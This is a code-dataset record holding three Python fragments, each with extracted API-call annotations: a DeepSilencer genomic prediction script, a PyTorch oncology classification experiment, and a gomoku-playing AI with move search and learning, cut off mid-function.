sub_seq = silencer_seq[-ind-K-1:-ind-1]
index = 0
for j in range(K):
index += encoding_matrix[sub_seq[j]]*(4**(K-j-1))
kmer[index] = kmer[index] - 1
add_seq = silencer_seq[-ind-202:-ind-202+K]
index = 0
for j in range(K):
index += encoding_matrix[add_seq[j]]*(4**(K-j-1))
kmer[index] = kmer[index]+1
test_data_kmer.append(kmer)
# take the average of n results
test_data_kmer = np.array(test_data_kmer).reshape(-1,4**K)
pred_label = deepsilencer.predict(silencer_mat, test_data_kmer)
pred_result.append(sum(pred_label)/num)
workbook = load_workbook(mapping)
booksheet = workbook.active
# obtain row data in sheet
rows = booksheet.rows
# obtain column data in sheet
columns = booksheet.columns
i = 1
# Iterate over all the rows
cell_type = []
cell_line = []
tissue = []
organ = []
for row in rows:
i = i + 1
line = [col.value for col in row]
cell_data_1 = booksheet.cell(row=i, column=1).value
cell_data_2 = booksheet.cell(row=i, column=2).value
cell_data_3 = booksheet.cell(row=i, column=3).value
cell_data_4 = booksheet.cell(row=i, column=4).value
cell_type.append(cell_data_1)
cell_line.append(cell_data_2)
tissue.append(cell_data_3)
organ.append(cell_data_4)
type2line = {cell_type[i]:cell_line[i] for i in range(len(cell_type))}
type2tissue = {cell_type[i]:tissue[i] for i in range(len(cell_type))}
type2organ = {cell_type[i]:organ[i] for i in range(len(cell_type))}
threshold = 0.5
name_test = '%s_%d_%d_%.2f.txt'%(data_name,start_position,end_position,threshold)
head = np.array([['Chrom','Start','End','Strand','Size','Method','Cell line','Tissue','Species'\
,'Genome','Organ','Reference','Pubmed']])
table = []
# to predict whether it is silencer
for i in range(start_position,end_position):
if pred_result[i-start_position] > threshold:
if indexes_encode[i][4] in type2line.keys():
table.append([indexes_encode[i][1],indexes_encode[i][2]+1,indexes_encode[i][3]+1,\
'.',-int(indexes_encode[i][2])+int(indexes_encode[i][3]), 'DeepSilencer',type2line[indexes_encode[i][4]],\
type2tissue[indexes_encode[i][4]],'Mus musculus',args.genome,\
type2organ[indexes_encode[i][4]],'.','.'])
table = np.array(table)
table = np.append(head,table,axis = 0)
# save result
if args.save_result:
if not os.path.exists(outdir):
os.makedirs(outdir)
np.savetxt(outdir + name_test,table,delimiter="\t",fmt = '%s') | [
"argparse.ArgumentParser",
"numpy.copy",
"os.makedirs",
"Loading_data.checkseq",
"os.getcwd",
"numpy.savetxt",
"os.path.exists",
"openpyxl.load_workbook",
"Loading_data.loadindex",
"numpy.append",
"Loading_data.seq_to_kspec",
"numpy.array",
"Loading_data.load_genome",
"Loading_data.seq2mat... | [((381, 495), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""DeepSilencer: Newly developed deep learning model to predict silencers"""'}), "(description=\n 'DeepSilencer: Newly developed deep learning model to predict silencers')\n", (404, 495), False, 'import argparse\n'), ((1720, 1744), 'Loading_data.load_genome', 'load_genome', (['args.genome'], {}), '(args.genome)\n', (1731, 1744), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((1766, 1802), 'Loading_data.loadindex', 'loadindex', (['sequences'], {'name': 'args.data'}), '(sequences, name=args.data)\n', (1775, 1802), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((2002, 2016), 'DeepSilencer.DeepSilencer', 'DeepSilencer', ([], {}), '()\n', (2014, 2016), False, 'from DeepSilencer import DeepSilencer\n'), ((5134, 5156), 'openpyxl.load_workbook', 'load_workbook', (['mapping'], {}), '(mapping)\n', (5147, 5156), False, 'from openpyxl import load_workbook\n'), ((6314, 6459), 'numpy.array', 'np.array', (["[['Chrom', 'Start', 'End', 'Strand', 'Size', 'Method', 'Cell line',\n 'Tissue', 'Species', 'Genome', 'Organ', 'Reference', 'Pubmed']]"], {}), "([['Chrom', 'Start', 'End', 'Strand', 'Size', 'Method', 'Cell line',\n 'Tissue', 'Species', 'Genome', 'Organ', 'Reference', 'Pubmed']])\n", (6322, 6459), True, 'import numpy as np\n'), ((7093, 7108), 'numpy.array', 'np.array', (['table'], {}), '(table)\n', (7101, 7108), True, 'import numpy as np\n'), ((7121, 7151), 'numpy.append', 'np.append', (['head', 'table'], {'axis': '(0)'}), '(head, table, axis=0)\n', (7130, 7151), True, 'import numpy as np\n'), ((4204, 4226), 'Loading_data.seq_to_kspec', 'seq_to_kspec', (['seq'], {'K': 'K'}), '(seq, K=K)\n', (4216, 4226), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((4297, 4316), 'numpy.copy', 'np.copy', (['kmer_whole'], {}), '(kmer_whole)\n', (4304, 4316), True, 'import numpy as np\n'), ((7274, 7337), 'numpy.savetxt', 'np.savetxt', (['(outdir + name_test)', 'table'], {'delimiter': '"""\t"""', 'fmt': '"""%s"""'}), "(outdir + name_test, table, delimiter='\\t', fmt='%s')\n", (7284, 7337), True, 'import numpy as np\n'), ((4405, 4418), 'numpy.copy', 'np.copy', (['kmer'], {}), '(kmer)\n', (4412, 4418), True, 'import numpy as np\n'), ((7210, 7232), 'os.path.exists', 'os.path.exists', (['outdir'], {}), '(outdir)\n', (7224, 7232), False, 'import os\n'), ((7246, 7265), 'os.makedirs', 'os.makedirs', (['outdir'], {}), '(outdir)\n', (7257, 7265), False, 'import os\n'), ((2980, 3019), 'Loading_data.checkseq', 'checkseq', (['chrkey', 'start', 'end', 'sequences'], {}), '(chrkey, start, end, sequences)\n', (2988, 3019), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((3824, 3868), 'Loading_data.seq2mat', 'seq2mat', (['sequences[item[1]][item[2]:item[3]]'], {}), '(sequences[item[1]][item[2]:item[3]])\n', (3831, 3868), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((4247, 4267), 'numpy.array', 'np.array', (['kmer_whole'], {}), '(kmer_whole)\n', (4255, 4267), True, 'import numpy as np\n'), ((4952, 4976), 'numpy.array', 'np.array', (['test_data_kmer'], {}), '(test_data_kmer)\n', (4960, 4976), True, 'import numpy as np\n'), ((670, 681), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (679, 681), False, 'import os\n'), ((3575, 3614), 'Loading_data.checkseq', 'checkseq', (['chrkey', 'start', 'end', 'sequences'], {}), '(chrkey, start, end, sequences)\n', (3583, 3614), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n')] |
from torch import optim
from torch.autograd import Variable
from torchvision import transforms, models
import torch
from sacred import Experiment
from sacred.observers import FileStorageObserver
from EL import CONSTS
import argparse
import numpy as np
import os
from EL.data.data import OncologyDataset
from EL.models.models import SenderOncoFeat, ReceiverOncoFeat
import torch.nn as nn
from aviation.utils.pytorchtools import EarlyStopping
from torch.utils.tensorboard import SummaryWriter
from torch.optim.lr_scheduler import ReduceLROnPlateau
import torch.nn.functional as F
import matplotlib.pyplot as plt
import pickle
LOG_DIR_PATH = os.path.join(CONSTS.RESULTS_DIR, 'logs')
# PLOT_DIR = CONSTS.OUTPUT_DIR
ex = Experiment('EL')
# ex.observers.append(FileStorageObserver(LOG_DIR_PATH))
@ex.config
def config():
batch_size = 171
epochs = 2000
log_interval = 10
img_size_x = 224
img_size_y = 224
exp_name = 'oncology_features_game'
gpu = 0
pretrained = False
train_batches_per_epoch = None
val_batches_per_epoch = None
max_len = 3
embed_dim = 200
lr = 1e-3
hidden_size = 100
class OncoModel(nn.Module):
def __init__(self, sender, receiver):
super(OncoModel, self).__init__()
self.sender = sender
self.receiver = receiver
def forward(self, x):
out = self.sender(x)
out = self.receiver(out)
return out
def loss_function(output, label):
return nn.CrossEntropyLoss()(output, label)
def train_epoch(epoch, model, train_data_loader, device, optimizer, args):
model.train()
train_loss = 0
total = 0
correct = 0
for batch_idx, datas in enumerate(train_data_loader):
if datas is None:
continue
label = datas[1].to(device)
data = Variable(datas[0])
data = data.to(device)
data = data.type(torch.cuda.FloatTensor)
optimizer.zero_grad()
out = model(data)
loss = loss_function(out, label)
loss.backward()
_, pred = torch.max(out, 1)
total += len(label)
correct += (pred == label).sum().item()
train_loss += loss.data
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tAccuracy: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_data_loader.dataset),
100. * batch_idx / len(train_data_loader),
loss.data / len(data), correct / total))
train_loss = train_loss / len(train_data_loader.dataset)
train_accuracy = correct / total
return train_loss, train_accuracy
def val(model, val_data_loader, device):
model.eval()
val_loss = 0
correct = 0
total = 0
'''operations inside don't track history so don't allocate extra memory in GPU '''
with torch.no_grad():
for i, datas in enumerate(val_data_loader):
if datas is None:
continue
label = datas[1].to(device)
data = datas[0].to(device)
data = data.type(torch.cuda.FloatTensor)
out = model(data)
val_loss += loss_function(out, label).data
_, pred = torch.max(out, 1)
total += len(label)
correct += (pred == label).sum().item()
val_loss /= len(val_data_loader.dataset)
val_accuracy = correct / total
return val_loss, val_accuracy
@ex.automain
def main(_run):
# ===============
# INTRO
# ===============
args = argparse.Namespace(**_run.config)
torch.manual_seed(args.seed)
np.random.seed(args.seed)
if args.gpu > -1:
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
if args.gpu < 0:
device = torch.device("cpu")
else:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
data_transforms = {
'train': transforms.Compose([
# transforms.Resize((22, 22)),
# transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.RandomRotation(degrees=45),
transforms.ToTensor(),
]),
'val': transforms.Compose([
# transforms.Resize((224, 224)),
transforms.ToTensor(),
]),
}
## DATASET
with open(os.path.join(CONSTS.DATA_DIR, 'pathology', 'train.pkl'), 'rb') as file:
train_data = pickle.load(file)
with open(os.path.join(CONSTS.DATA_DIR, 'pathology', 'test.pkl'), 'rb') as file:
val_data = pickle.load(file)
train_dataset = OncologyDataset(data_dict=train_data, data_type='features')
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)
val_dataset = OncologyDataset(data_dict=val_data, data_type='features')
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False)
sender = SenderOncoFeat(hidden_size=args.hidden_size)
receiver = ReceiverOncoFeat(input_size=args.hidden_size)
model_path = os.path.join(CONSTS.RESULTS_DIR, 'models', args.exp_name)
if not os.path.exists(model_path):
os.makedirs(model_path)
output_dir = os.path.join(CONSTS.RESULTS_DIR, 'outputs', args.exp_name)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
tensorboard_path = os.path.join(CONSTS.RESULTS_DIR, 'logs', 'tensorboard', args.exp_name)
if not os.path.exists(tensorboard_path):
os.makedirs(tensorboard_path)
model = OncoModel(sender, receiver)
model.load_state_dict(torch.load(os.path.join(model_path, 'best_model.pth')))
model.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
scheduler = ReduceLROnPlateau(optimizer, 'min', patience=3, verbose=True)
writer = SummaryWriter(tensorboard_path, comment=args.exp_name)
patience = 20
early_stopping = EarlyStopping(patience=patience, verbose=True, save=os.path.join(model_path, 'best_model.pth'))
for epoch in range(1, args.epochs + 1):
# train_epoch_loss, train_epoch_accuracy = train_epoch(epoch, model, train_loader, device, optimizer, args)
# print('====> Epoch: {} Average training loss: {:.4f}'.format(
# epoch, train_epoch_loss))
# print('====> Epoch: {} Average training accuracy: {:.4f} %'.format(
# epoch, train_epoch_accuracy*100))
val_epoch_loss, val_epoch_accuracy = val(model, val_loader, device)
print('====> val set loss: {:.4f}'.format(val_epoch_loss))
print('====> val set accuracy: {:.4f} %'.format(val_epoch_accuracy*100))
# writer.add_scalar('Loss/train', train_epoch_loss, epoch)
# writer.add_scalar('Loss/val', val_epoch_loss, epoch)
# writer.add_scalar('Accuracy/train', train_epoch_accuracy, epoch)
# writer.add_scalar('Accuracy/val', val_epoch_accuracy, epoch)
#
# scheduler.step(train_epoch_loss)
# early_stopping(val_epoch_loss, model)
#
# writer.close() | [
"argparse.Namespace",
"numpy.random.seed",
"EL.models.models.SenderOncoFeat",
"pickle.load",
"torch.device",
"torch.no_grad",
"os.path.join",
"torch.utils.data.DataLoader",
"torchvision.transforms.RandomRotation",
"torch.optim.lr_scheduler.ReduceLROnPlateau",
"os.path.exists",
"EL.models.model... | [((640, 680), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""logs"""'], {}), "(CONSTS.RESULTS_DIR, 'logs')\n", (652, 680), False, 'import os\n'), ((718, 734), 'sacred.Experiment', 'Experiment', (['"""EL"""'], {}), "('EL')\n", (728, 734), False, 'from sacred import Experiment\n'), ((3568, 3601), 'argparse.Namespace', 'argparse.Namespace', ([], {}), '(**_run.config)\n', (3586, 3601), False, 'import argparse\n'), ((3606, 3634), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (3623, 3634), False, 'import torch\n'), ((3639, 3664), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (3653, 3664), True, 'import numpy as np\n'), ((4651, 4710), 'EL.data.data.OncologyDataset', 'OncologyDataset', ([], {'data_dict': 'train_data', 'data_type': '"""features"""'}), "(data_dict=train_data, data_type='features')\n", (4666, 4710), False, 'from EL.data.data import OncologyDataset\n'), ((4730, 4818), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)'}), '(train_dataset, batch_size=args.batch_size,\n shuffle=True)\n', (4757, 4818), False, 'import torch\n'), ((4833, 4890), 'EL.data.data.OncologyDataset', 'OncologyDataset', ([], {'data_dict': 'val_data', 'data_type': '"""features"""'}), "(data_dict=val_data, data_type='features')\n", (4848, 4890), False, 'from EL.data.data import OncologyDataset\n'), ((4908, 4995), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['val_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(False)'}), '(val_dataset, batch_size=args.batch_size,\n shuffle=False)\n', (4935, 4995), False, 'import torch\n'), ((5007, 5051), 'EL.models.models.SenderOncoFeat', 'SenderOncoFeat', ([], {'hidden_size': 'args.hidden_size'}), '(hidden_size=args.hidden_size)\n', (5021, 5051), False, 'from EL.models.models import SenderOncoFeat, ReceiverOncoFeat\n'), ((5067, 5112), 'EL.models.models.ReceiverOncoFeat', 'ReceiverOncoFeat', ([], {'input_size': 'args.hidden_size'}), '(input_size=args.hidden_size)\n', (5083, 5112), False, 'from EL.models.models import SenderOncoFeat, ReceiverOncoFeat\n'), ((5133, 5190), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""models"""', 'args.exp_name'], {}), "(CONSTS.RESULTS_DIR, 'models', args.exp_name)\n", (5145, 5190), False, 'import os\n'), ((5280, 5338), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""outputs"""', 'args.exp_name'], {}), "(CONSTS.RESULTS_DIR, 'outputs', args.exp_name)\n", (5292, 5338), False, 'import os\n'), ((5434, 5504), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""logs"""', '"""tensorboard"""', 'args.exp_name'], {}), "(CONSTS.RESULTS_DIR, 'logs', 'tensorboard', args.exp_name)\n", (5446, 5504), False, 'import os\n'), ((5807, 5868), 'torch.optim.lr_scheduler.ReduceLROnPlateau', 'ReduceLROnPlateau', (['optimizer', '"""min"""'], {'patience': '(3)', 'verbose': '(True)'}), "(optimizer, 'min', patience=3, verbose=True)\n", (5824, 5868), False, 'from torch.optim.lr_scheduler import ReduceLROnPlateau\n'), ((5882, 5936), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (['tensorboard_path'], {'comment': 'args.exp_name'}), '(tensorboard_path, comment=args.exp_name)\n', (5895, 5936), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((1467, 1488), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1486, 1488), True, 'import torch.nn as nn\n'), ((1804, 1822), 'torch.autograd.Variable', 'Variable', (['datas[0]'], {}), '(datas[0])\n', (1812, 1822), False, 'from torch.autograd import Variable\n'), ((2042, 2059), 'torch.max', 'torch.max', (['out', '(1)'], {}), '(out, 1)\n', (2051, 2059), False, 'import torch\n'), ((2880, 2895), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2893, 2895), False, 'import torch\n'), ((3823, 3842), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (3835, 3842), False, 'import torch\n'), ((4489, 4506), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (4500, 4506), False, 'import pickle\n'), ((4612, 4629), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (4623, 4629), False, 'import pickle\n'), ((5202, 5228), 'os.path.exists', 'os.path.exists', (['model_path'], {}), '(model_path)\n', (5216, 5228), False, 'import os\n'), ((5238, 5261), 'os.makedirs', 'os.makedirs', (['model_path'], {}), '(model_path)\n', (5249, 5261), False, 'import os\n'), ((5350, 5376), 'os.path.exists', 'os.path.exists', (['output_dir'], {}), '(output_dir)\n', (5364, 5376), False, 'import os\n'), ((5386, 5409), 'os.makedirs', 'os.makedirs', (['output_dir'], {}), '(output_dir)\n', (5397, 5409), False, 'import os\n'), ((5516, 5548), 'os.path.exists', 'os.path.exists', (['tensorboard_path'], {}), '(tensorboard_path)\n', (5530, 5548), False, 'import os\n'), ((5558, 5587), 'os.makedirs', 'os.makedirs', (['tensorboard_path'], {}), '(tensorboard_path)\n', (5569, 5587), False, 'import os\n'), ((3243, 3260), 'torch.max', 'torch.max', (['out', '(1)'], {}), '(out, 1)\n', (3252, 3260), False, 'import torch\n'), ((4396, 4451), 'os.path.join', 'os.path.join', (['CONSTS.DATA_DIR', '"""pathology"""', '"""train.pkl"""'], {}), "(CONSTS.DATA_DIR, 'pathology', 'train.pkl')\n", (4408, 4451), False, 'import os\n'), ((4522, 4576), 'os.path.join', 'os.path.join', (['CONSTS.DATA_DIR', '"""pathology"""', '"""test.pkl"""'], {}), "(CONSTS.DATA_DIR, 'pathology', 'test.pkl')\n", (4534, 4576), False, 'import os\n'), ((5666, 5708), 'os.path.join', 'os.path.join', (['model_path', '"""best_model.pth"""'], {}), "(model_path, 'best_model.pth')\n", (5678, 5708), False, 'import os\n'), ((6030, 6072), 'os.path.join', 'os.path.join', (['model_path', '"""best_model.pth"""'], {}), "(model_path, 'best_model.pth')\n", (6042, 6072), False, 'import os\n'), ((3895, 3920), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3918, 3920), False, 'import torch\n'), ((4100, 4131), 'torchvision.transforms.RandomVerticalFlip', 'transforms.RandomVerticalFlip', ([], {}), '()\n', (4129, 4131), False, 'from torchvision import transforms, models\n'), ((4145, 4182), 'torchvision.transforms.RandomRotation', 'transforms.RandomRotation', ([], {'degrees': '(45)'}), '(degrees=45)\n', (4170, 4182), False, 'from torchvision import transforms, models\n'), ((4196, 4217), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4215, 4217), False, 'from torchvision import transforms, models\n'), ((4324, 4345), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4343, 4345), False, 'from torchvision import transforms, models\n')] |
#!/usr/bin/env python
from __future__ import print_function, division
import itertools, time, copy
import collections, random
import os, pickle
import numba
import numpy as np
board_size = 15
show_q = False
class AIPlayer:
def __init__(self, name, model):
self.name = name
self.model = model
self.learndata = dict()
self.opponent = None
self.all_interest_states = np.zeros(board_size**4 * 3, dtype=np.float16).reshape(board_size**2, board_size, board_size, 3)
self.move_interest_values = np.zeros(board_size**2, dtype=np.float32).reshape(board_size,board_size)
self.reset()
self.reset_cache()
def reset(self):
""" Reset before a new game """
self.hist_states = []
self.surprised = False
self.started_from_beginning = True
def reset_cache(self):
""" Reset cache before using new model """
self.tf_cache = LRU(maxsize=1000000)
def strategy(self, board_state):
""" AI's strategy
Information provided to you:
board_state = (board, last_move, playing, board_size)
board = (x_stones, o_stones)
stones is a set contains positions of one player's stones. e.g.
x_stones = {(8,8), (8,9), (8,10), (8,11)}
playing = 0|1, the current player's index
Your strategy will return a position code for the next stone, e.g. (8,7)
"""
# load input board_state
board, last_move, playing, board_size = board_state
self.playing_white = bool(playing)
my_stones = board[playing]
opponent_stones = board[1-playing]
last_move = (last_move[0]-1, last_move[1]-1)
# build new state representation
state = np.zeros(board_size**2, dtype=np.int8).reshape(board_size, board_size)
for i,j in my_stones:
state[i-1,j-1] = 1
for i,j in opponent_stones:
state[i-1,j-1] = -1
# prepare input for best_action_q
alpha = -2.0
beta = 2.0
empty_spots_left = board_size**2 - len(my_stones) - len(opponent_stones) # np.sum(state==0)
# predict next best action and q
best_move, best_q = self.best_action_q(state, empty_spots_left, alpha, beta, 1)
# update winrate if game finish
self.update_if_game_finish(state, best_move, best_q, empty_spots_left)
# return the best move
return (best_move[0]+1, best_move[1]+1)
def best_action_q(self, state, empty_spots_left, alpha, beta, player):
""" get the optimal action for a state and the predicted win rate
Params
------
state: np.ndarray of shape (15, 15)
The current game state in a matrix. 1 is my stone, -1 is opponent stone, 0 is empty
empty_spots_left: int
How many empty spots are left, easy to keep track
alpha: float
Current alpha value in alpha-beta pruning, the running min of the max win rate
beta: float
Current beta value in alpha-beta pruning, the running max of the min win rate
player: int
The current player. 1 is me, -1 is opponent
Returns
-------
best_move: tuple(int, int)
The best move on the board, given by (r, c)
best_q: float
The value the best move. 1.0 means 100% win, -1.0 means 100% lose, 0 means draw
"""
if empty_spots_left == 0: # Board filled up, it's a tie
return None, 0.0
verbose = False
n_moves = 40 if empty_spots_left > 200 else 20
self.move_interest_values.fill(0) # reuse the same array to save init cost
self.move_interest_values[4:11, 4:11] = 5.0 # manually assign higher interest in middle
interested_moves = find_interesting_moves(state, empty_spots_left, self.move_interest_values, player, n_moves, verbose)
#best_move = (-1,-1) # admit defeat if all moves have 0 win rate
best_move = (interested_moves[0,0], interested_moves[0,1]) # continue to play even I'm losing
if len(interested_moves) == 1:
state[best_move] = player # temporarily put the stone down
if i_lost(state, player):
# if i lost after putting this stone, return -1.0 win rate
best_q = -1.0 if player == 1 else 1.0
return best_move, best_q
if i_will_win(state, best_move, player):
# if i will win no matter what opponent does, return 1.0 win rate
best_q = 1.0 if player == 1 else -1.0
return best_move, best_q
state[best_move] = 0 # reset the temporarily stone
# find the known moves among interested_moves
tf_moves = [] # all unknown moves will be evaluated by tf_evaluate_max_u
tf_move_ids = []
max_q = -1.0
for this_move in interested_moves:
this_move = (this_move[0], this_move[1])
assert state[this_move] == 0 # interest move should be empty here
state[this_move] = 1
this_state_id = state.tobytes()
state[this_move] = 0
cached_q = None
# try read from learndata
try:
cached_q = self.learndata[this_state_id][1]
except KeyError:
pass
# try use cache
if cached_q is None:
try:
cached_q = self.tf_cache[this_state_id]
except KeyError:
pass
# add to compute list
if cached_q is not None:
if cached_q > max_q:
max_q = cached_q
best_move = this_move
else:
tf_moves.append(this_move)
tf_move_ids.append(this_state_id)
# n_found = len(interested_moves) - len(tf_moves)
# if n_found > 0:
# print(f'Found {n_found} moves in learndata')
# run tensorflow model predict
n_tf = len(tf_moves)
if n_tf > 0:
all_interest_states = self.all_interest_states[:n_tf] # we only need a slice of the big array
all_interest_states[:,:,:,0] = (state == 1)
all_interest_states[:,:,:,1] = (state == -1)
all_interest_states[:,:,:,2] = 0 if self.playing_white else 1 # if I'm black, next is me so black
for i,current_move in enumerate(tf_moves):
ci, cj = current_move
all_interest_states[i,ci,cj,0] = 1 # put current move down
predict_y = self.model.predict(all_interest_states, batch_size=n_tf)
predict_y = np.array(predict_y).flatten()
# store predict result in cache
for move_id, y in zip(tf_move_ids, predict_y):
self.tf_cache[move_id] = y
# find the largest y
idx = np.argmax(predict_y)
if predict_y[idx] > max_q:
max_q = predict_y[idx]
best_move = tf_moves[idx]
return best_move, max_q
def update_if_game_finish(self, state, best_move, best_q, empty_spots_left):
# store data for this step in opponent learn data
opponent_state = -state
opponent_state_id = opponent_state.tobytes()
opponent_q = -best_q
if opponent_state_id not in self.opponent.learndata:
self.opponent.learndata[opponent_state_id] = [opponent_state, opponent_q, 1]
# record the history states
self.hist_states.append(opponent_state_id)
# check if game finish
state[best_move] = 1
game_result = None
new_u = 0
if i_win(state, best_move, 1):
new_u = -1.0
game_result = 'win'
elif i_lost(state, 1):
new_u = 1.0
game_result = 'lose'
elif empty_spots_left <= 2:
new_u = 0
game_result = 'draw'
if game_result and self.started_from_beginning is True:
discount = 0.9
for opponent_state_id in self.hist_states[::-1]:
st, u, n_visited = self.opponent.learndata[opponent_state_id]
n_visited += 1
new_u = u + discount * (new_u - u) / n_visited**0.5 # this is the learning rate
# surprise
if (game_result == 'win' and new_u > 0.1) or (game_result == 'lose' and new_u < -0.1):
self.surprised = True
self.opponent.learndata[opponent_state_id] = (st, new_u, n_visited)
print(f"Updated U from {u:9.6f} to {new_u:9.6f} [{n_visited}]")
print(f"{self.name}: Updated win rate of {len(self.hist_states)} states")
self.started_from_beginning = False # we only update once
# Below are utility functions
@numba.jit(nopython=True, nogil=True)
def find_interesting_moves(state, empty_spots_left, move_interest_values, player, n_moves, verbose=False):
""" Look at state and find the interesing n_move moves.
input:
-------
state: numpy.array board_size x board_size
empty_spots_left: number of empty spots on the board
player: 1 or -1, the current player
n_moves: int, desired number of interesing moves
output:
-------
interested_moves: numpy.array final_n_moves x 2
*note : final_n_moves = 1 if limited
* else final_n_moves = n_moves + number of length-4 moves
*note2: final_n_moves will not exceed empty_spots_left
#suggested_n_moves: suggested number of moves to
"""
force_to_block = False
exist_will_win_move = False
directions = ((1,1), (1,0), (0,1), (1,-1))
final_single_move = np.zeros(2, dtype=np.int64).reshape(1,2) # for returning the single move
for r in range(board_size):
for c in range(board_size):
if state[r,c] != 0: continue
interest_value = 10 # as long as it's a valid point, this is for avoiding the taken spaces
my_hard_4 = 0
for dr, dc in directions:
my_line_length = 1 # last_move
opponent_line_length = 1
# try to extend in the positive direction (max 5 times to check overline)
ext_r = r
ext_c = c
skipped_1 = 0
my_blocked = False
opponent_blocked = False
for i in range(5):
ext_r += dr
ext_c += dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
if my_blocked == True:
break
else:
my_line_length += 1
opponent_blocked = True
elif state[ext_r, ext_c] == -player:
if opponent_blocked == True:
break
else:
opponent_line_length += 1
my_blocked = True
elif skipped_1 == 0:
skipped_1 = i + 1 # allow one skip and record the position of the skip
else:
# peek at the next one and if it might be useful, add some interest
if ((state[ext_r+dr, ext_c+dc] == player) and (my_blocked == False)) or ((state[ext_r+dr, ext_c+dc] == -player) and (opponent_blocked == False)):
interest_value += 15
break
# the backward counting starts at the furthest "unskipped" stone
forward_my_open = False
forward_opponent_open = False
if skipped_1 == 0:
my_line_length_back = my_line_length
opponent_line_length_back = opponent_line_length
elif skipped_1 == 1:
my_line_length_back = 1
opponent_line_length_back = 1
forward_my_open = True
forward_opponent_open = True
else:
if my_blocked == False:
my_line_length_back = skipped_1
opponent_line_length_back = 1
forward_my_open = True
else:
my_line_length_back = 1
opponent_line_length_back = skipped_1
forward_opponent_open = True
my_line_length_no_skip = my_line_length_back
opponent_line_length_no_skip = opponent_line_length_back
# backward is a little complicated, will try to extend my stones first
ext_r = r
ext_c = c
skipped_2 = 0
opponent_blocked = False
for i in range(6-my_line_length_no_skip):
ext_r -= dr
ext_c -= dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
my_line_length_back += 1
opponent_blocked = True
elif state[ext_r, ext_c] == -player:
break
else:
if skipped_2 == 0:
skipped_2 = i + 1
else:
# peek at the next one and if it might be useful, add some interest
if state[ext_r-dr, ext_c-dc] == player:
interest_value += 15
break
# see if i'm winning
if my_line_length_back == 5:
# if there are 5 stones in backward counting, and it's not skipped in the middle
if skipped_2 == 0 or skipped_2 == (6-my_line_length_no_skip):
# i will win with this move, I will place the stone
final_single_move[0,0] = r
final_single_move[0,1] = c
return final_single_move
# extend my forward line length to check if there is hard 4
if skipped_2 == 0:
my_line_length += my_line_length_back - my_line_length_no_skip
else:
my_line_length += skipped_2 - 1
backward_my_open = True if skipped_2 > 0 else False
backward_opponent_open = False
# then try to extend the opponent
if opponent_blocked == True:
if skipped_2 == 1:
backward_opponent_open = True
skipped_2 = 0 # reset the skipped_2 here to enable the check of opponent 5 later
else:
ext_r = r
ext_c = c
skipped_2 = 0
for i in range(6-opponent_line_length_no_skip):
ext_r -= dr
ext_c -= dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
break
elif state[ext_r, ext_c] == -player:
opponent_line_length_back += 1
else:
if skipped_2 == 0:
skipped_2 = i + 1
else:
# peek at the next one and if it might be useful, add some interest
if state[ext_r-dr, ext_c-dc] == -player:
interest_value += 15
break
# extend opponent forward line length to check if there is hard 4
if skipped_2 == 0:
opponent_line_length += opponent_line_length_back - opponent_line_length_no_skip
else:
opponent_line_length += skipped_2 - 1
backward_opponent_open = True
# here if opponent_line_length_back == 5, skipped_2 will be 0 and this flag won't be True
# but it do not affect our final result, because we have to block this no matter if it's open
# check if we have to block this
if opponent_line_length_back == 5:
if (skipped_2 == 0) or (skipped_2 == 6-opponent_line_length_no_skip):
final_single_move[0,0] = r
